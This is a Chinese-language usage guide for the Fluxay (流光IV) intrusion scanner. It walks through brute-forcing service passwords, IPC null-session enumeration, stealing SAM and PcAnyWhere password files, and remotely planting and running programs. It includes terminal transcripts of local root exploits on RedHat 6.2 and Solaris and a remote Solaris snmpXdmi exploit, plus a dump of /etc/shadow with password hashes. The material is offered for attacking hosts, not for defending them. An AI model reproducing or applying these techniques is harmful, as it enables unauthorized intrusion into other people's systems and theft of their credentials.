扫描器流光FLUXAY5的使用方法Word文件下载.docx

1、ALL-所有系统 NT-NT2000系统 UNIX-UNIX系统，根据选择的不同下面的检测项目将会有不同设置。获取主机名：获取主机的名称。检测项目：选择需要扫描的项目，根据选择的不同表单会有所不同。2、端口扫描标准端口扫描：包括常用的服务端口扫描 自定端口扫描：范围从1-65534 3、POP3扫描获取POP3版本信息：取得Banner 尝试猜解用户：根据选项中的设置对常见用户名进行暴力模式猜解。4、FTP扫描获取FTP版本信息：尝试匿名登陆：测试FTP服务器能否匿名登陆 5、SMTP扫描获取SMTP版本信息：EXPN/VRFY扫描：通过SMTP的EXPN/VRFY验证用户是否存在。6、IMA

2、P扫描获取IMAP版本信息：尝试猜解用户帐号：7、TELNET扫描获取TELNET版本信息：8、CGI扫描获取WWW版本信息：根据版本决定采用NT或者UNIX方式：根据www的版本信息，在扫描的时候自动选择NT规则库或者UNIX规则库。支用HTTP 200/502有效：为了避免不必要的误报，只有HTTP返回200（OK）/502（Gateway Error）才认为有效。流光IV中CGI扫描采用了Error_Page陷阱检测技术，使得一些采用了Error_Page的主机也能够被正常扫描到，这一点是目前几乎所有的CGI扫描器所不具备的。9、CGI Rule设置类型选择：可以选择ALL、NT、UNI

3、X，如果在CGI中选择了根据版本决定采用NT或者UNIX方式此项通常无需更改。漏洞列表：默认扫描列表中的所有规则（全部选中），也可以根据需要只对某一个漏洞或者某几个漏洞进行扫描（仅选择需要的规则即可）。CGI规则可以根据需要自行扩展，扩展的方法见CGI规则的扩展一节。10、SQL尝试通过漏洞获得密码：根据IIS的漏洞获得SQL的连接密码。对SA密码进行猜解：根据选项中的设置对SA密码进行暴力模式破解。11、IPC空连接（NULL Session）扫描：尝试和远程主机建立空连接，所谓空连接就是创建一个用户名和密码都为空的访问令牌。扫描共享资源：扫描网络中的共享资源。共享资源在98MENT2000

4、中都存在，所不同的在于访问98ME中共享资源通常无需提供任何凭证（也就是任何人都可以访问）；访问NT2000中的共享资源通常需要提供一个访问凭证（即需要有一个用户名和密码）。流光IV会对这两种不同的资源进行区分。尝试获取用户名：NT2000在默认安装的情况下可以通过空连接获取目标主机的用户名。尝试对获取的用户名进行猜解：对获得用户名根据选项中的设置进行暴力模式破解。NT在通过IPC建立连接的时候，在同一时间只允许和一台主机建立一个连接，这样以来多线程就毫无用处。不过如果NT如果同时提供了MSFTP服务就可以通过FTP对用户进行告诉猜解（因为FTP没有同一时间只允许一个连接的限制），流光IV可以

5、自动根据情况选择IPC或者FTP模式的猜解。仅对Administrators组进行猜解：对获得的用户名进行判断，仅仅对属于Administrators组的用户进行上述猜解。12、IISUnicode编码漏洞：尝试6种方法（Remoe Execute A-F）扫描Unicode编码漏洞。FrontPage扩展：扫描是否安装了Frontpage扩展。如果安装了Frontpage扩展，也可以采用HTTP扫描中的NTLM模式对NT系统帐号进行高速猜解。尝试获取SAM文件：NT2000的密码文件存在于SAM文件中，如果获得了SAM文件就可以在本地利用L0pht（下载）进行破解。尝试获取PcAnyWher

6、e密码文件：尝试获取PcAnyWhere密码文件，获得后，可以用流光IV中工具进行解码（不是暴力破解）。13、Finger扫描Finger功能：利用Finger功能可以测试某个用户是否存在。对Sun OS尝试获得用户列表：Sun OS的Finger功能由一个特点，可以列出最近登陆的用户名。在FTPPOP3IMAP扫描中也会首先进行Finger的测试，如果测试成功就会用获得用户名列表来代替选项中的用户名字典。14、RPC扫描RPC服务：扫描RPC服务，得到服务的ID的信息。UNIX中的RPC是漏洞比较多的服务之一，特别是SunOS。15、MISCBIND版本扫描：扫描BIND服务，得到版本信息。

7、猜解MySQL密码：MySQL是UNIX中一种很常见的免费数据库（一般国内常见的模式是NT+IIS+MSSQL/UNIX+Apache+MySQL），得到了MySQL的密码就可以查阅数据库中的所有内容。16、PLUGINS类型：ALL、NT、UNIX。PlugIn列表：列出当前安装的所有PlugIn的信息。流光IV中的PlugIn是一项很有用的功能，可以很方便地利用现有流光的扫描框架进行扩展。关于Plugin的具体信息，请参见如何编写流光IV的插件。17、选项猜解用户名字典：设置扫描中采用的用户字典，适用于POP3/FTP/IMAP/SQL/MYSQL。猜解密码字典：设置扫描中采用的密码字典，

8、适用于POP3/FTP/IMAP/SQL/MYSQL。保存扫描报告：扫描的报告，采用HTML格式。并发线程数目：默认80，可以根据情况增减，如果线程数目越大速度越快但是越容易误报和漏报。网络选项：设置TCP参数 TCP连接超时：建立TCP连接时的超时设置，默认10秒（10000毫秒） TCP数据超时：收发数据时的超时设置如果建立连接或收发数据时出现了超时，则说明连接收发数据失败。通常TCP超时设置小，扫描速度就越快，但是就越容易漏报。如果设置太大，扫描的速度会变慢，但是漏报就比较少。具体的设置，需要根据自己的的网络状况决定。一、可以直接测试的部分流光IV高级扫描完成后，会产生一个扫描报告，此外

9、一部分扫描结果也会在界面上得到直接的反映。1、IPC对于IPC的扫描结果，可以直接在上面点左键，出现连接.字样，选择执行。这时出现了NTCMD的界面，NTCMD如果连接成功具有System权限，可以执行命令，例如创建帐号等。关于IPC的更多信息请参见流光2000IPC使用说明。2、SQL选择连接.出现SQL Shell的界面。如果没有安装SQL Server,那么对方主机必须允许建立空连接才能够连接成功（默认安装Express版,所以首先需要安装SqlRcmd Normal版,在SqlRcmdNormal中）。为了让流光IV的SQL扫描发挥最大作用，建议安装SQL Server。通常情况下，S

10、QLCMD具有System权限，可以执行命令。如果SQL Server是以用户身份启动，那么就具有启动用户身份的权限。如果需要将数据库的数据导出，通常需要安装SQL Server。3、FTP同上述方法，流光IV会自动调用系统的FTP程序。4、IIS Remote Execute -X选择连接.,出现一个设置的对话框如果在使用中出现问题，请取消选择允许IIS检测CMD。通常情况下IIS Remote Execute具有IUSR_ComputerName帐号权限。5、Remote FTP PCAnyWhere密码文件使用此功能必须首先拥有一个具有写权限的FTP服务器，以便流光IV将密码文件上传。出

11、现上传FTP服务器设置的对话框。如果上传失败（流光IV本身不能确认是否上传成功），请选择禁止IIS检测CMD。上传成功之后，就可连接到自己指定的FTP的服务器，将文件下载到本机，利用流光IV中PCAnyWhere解码工具解码。这样就可以通过PCAnyWhere连接管理远程主机了。6、FrontPage 扩展如果扫描到FrontPage扩展，也可以用来暴力破解NT系统帐号（当然这种方法没有直接通过MSFTP快）。（1）、首先通过IPC得到用户列表（具体方法参见流光2000IPC探测说明）（2）、加入HTTP主机注意后面的URL不要敲错。（3）、从IPC主机导入（4）、选择需要探测的用户（5）、加

12、入字典后开始扫描注意在HTTP的NTLM和Negotiate模式中只能开启一个线程。7、IIS5 .Printer可以使用IIS5Hacker测试。二、其他部分1、IPC种植者如果获得了NT/2000机器的Administrators组的密码，也可以通过IPC种植者上传和执行程序（利用Schedule服务和IPC管道）。从工具-NT/IIS-种植者启动程序。设置好所需项目后，按开始即可上传和制定的程序（当程序复制完之后，大约需要一分钟后程序才会启动）。2、MySQLMySQL是UNIX中最常用的免费数据库，流光IV可以检测到MySQL的弱密码。通过MySQL的客户端程序（）连接远程数据库即可查

13、阅数据库的所有信息。关于MySQL的相关信息请查阅相关资料。三、UNIX的本地溢出UNIX的本地溢出，需要由一个具有Shell权限的帐号，通常情况下这一帐号通过弱密码得到。弱密码可以通过FTP扫描或POP3扫描得到。所有关于UNIX的溢出测试，均需要由一个UNIXLinux的环境进行编译。1、Example of RedHat 6.2 SU通过Telnet连接到远程主机（推荐用Secure CRT，在流光IV的安装目录中有）。Linux RedHat 6.2 Local ExploitKernel 2.2.14-6.1 on an i686login: serverPassword:serve

14、rWebServer5 server$vi su.cserverWebServer5 /tmp$ gcc -o su su.cserverWebServer5 /tmp$ ./susu exploit by XP Enjoy!Phase 1. Checking paths and write permisionsChecking for /usr/bin/msgfmt.OkChecking for /usr/bin/objdump.OkChecking write permisions on /tmp.OkChecking read permisions on /bin/su.OkChecki

15、ng for a valid language. using af_ZA OkChecking that /tmp/LC_MESSAGES does not exist.OkPhase 2. Calculating eat and pad values.doneeat = 120 and pad = 2Phase 3. Creating evil libc.mo and setting enviromentvarsPhase 4. Getting address of .dtors section of /bin/su.done.dtors is at 0x0804bd3cPhase 5. C

16、ompiling suid shell/tmp/xp created OkPhase 6. Executing /bin/su- Entering rootshell ;-） -bash# iduid=0（root） gid=0（root） groups=504（server）bash# cat /etc/shadowroot:$1$CmIRSoFn$i6/jI1F5jOCYZK21PH3Rl1:11312:0:99999:7:-1:134539268bin:*:11288:daemon:adm:lp:sync:shutdown:halt:mail:news:uucp:games:gopher

17、:nobody:$1$YFv8hmgw$gr3suN6DxqqLUswxVJ49M.:11452:134540196xfs:!named:gdm:piranha:pvm:navy:$1$3H4IuGc7$8r3rutBAdVDtOPnVmwrTw1:135664172vip:$1$hle0b0Lj$923zX.laFy.h/3r42PhwI0:134540356sg:intel:$1$WfhnTH3y$JDDa31e/UF2CCpcx8zFjA0:11367:server:$1$6K.xS5bT$u0jAZWbNpq26jDA77b508/:11386:134539252leaf:$1$Y8k

18、81DPb$GQa54KyUUHHdLqcQTG6Fw0:11446:134540308operator:$1$uDR7PcOE$7pl2urVWKxGCVogueZFlC0:134540332bash# 2、Example of Sun OS Local Exploit对于SunOS的系统同样可以用本地溢出，首先需要做的仍然是得到一个普通帐号。用流光IV中高级扫描功能扫描某网段，其中得到这样的结果：Finger扫描Finger开放 得到用户列表 Login daemon bin sys zhxg gydan xumengxi zhangzheng gyd zzs zy liulang web

19、master vet vet120FTP扫描FTP版本信息: www FTP server （SunOS 5.6） ready.从结果可以看出，通过Sun的Finger得到了用户列表，同时主机的FTP开放，我们不妨用流光IV的FTP扫描试试。将主机加入FTP树型列表中，这一次我们不用指定用户列表，可以直接通过Finger获得。在主机上点右键-探测-Sun Solaris用户列表。经过简单模式探测后，得到了两个帐号。通过ScreCRT登陆上去。Sun Solaris 5.6 Sparc Local lpset ExploitSunOS 5.6 webmasterLast login: Fri M

20、ay 18 16:50:20 from 211.101.171.222Sun Microsystems Inc. SunOS 5.6 Generic August 1997% uname -aSunOS 5.6 Generic_105181-16 sun4u sparc SUNW,Ultra-2 /确定系统为Sun Solaris 2.6 Sparc% cd /tmp% lsdf.mon last_uuid llbdbase.dat ps_data speckeysd.lock% ftp xxx.xxx.xxx /从FTP服务器下载编译好的溢出程序（因为通常的Solaris默认安装没有gcc编

21、译器）Connected to .220 ProFTPD 1.2.1 Server （Virtual Hosting） xxx.xxx.xxxName （:liujy）: xxxxxxx331 Password required for xxxxxx.ftp bin200 Type set to I. ftp get lpset200 PORT command successful.150 Opening BINARY mode data connection for lpset （26148 bytes）.226 Transfer complete.local: lpset remote:

22、lpset26148 bytes received in 2.1 seconds （12.13 Kbytes/s） quit221 Goodbye.df.mon last_uuid llbdbase.dat lpset ps_data speckeysd.lock% chmod 777 lpset /修改文件属性为可执行% ./lpsetcopyright LAST STAGE OF DELIRIUM apr 2000 poland /lsd-/usr/bin/lpset for solaris 2.6 2.7 sparcFNS for files is not installedCannot

23、 use this command in this environmentUse: fncreate -t org command to install#/获得Root四、UNIX的远程溢出除了本地溢出之外，远程溢出也是一种常见的手段。1、Example of Sun Solaris 5.7/5.8 Sparc RPC.snmpRPC ScanRPC Program ID snmp UDP Sun solaris Sparc 7.0/8.0 Gain Root Shell如果出现这样的结果，说明对方系统的RPC中存在一个snmp服务。多数的Sun Solaris 5.7/5.8都存在远程溢出。

24、可以利用流光IV中附带的程序进行测试。Example of Sun Solaris 5.7 Sparc RCP.snmprootcodeguru /root# gcc -o snmp snmp.csnmp.c: In function main181: warning: passing arg 3 of pointer to function from incompatible pointer type passing arg 4 of pointer to function from incompatible pointer type passing arg 5 of pointer to function from incompatible pointer typerootcodeguru /root# ./snmp xxx.xxx.xxx.xxx -v 7copyright LAST STAGE OF DELIRIUM mar 2001 poland /lsd-snmpXdmi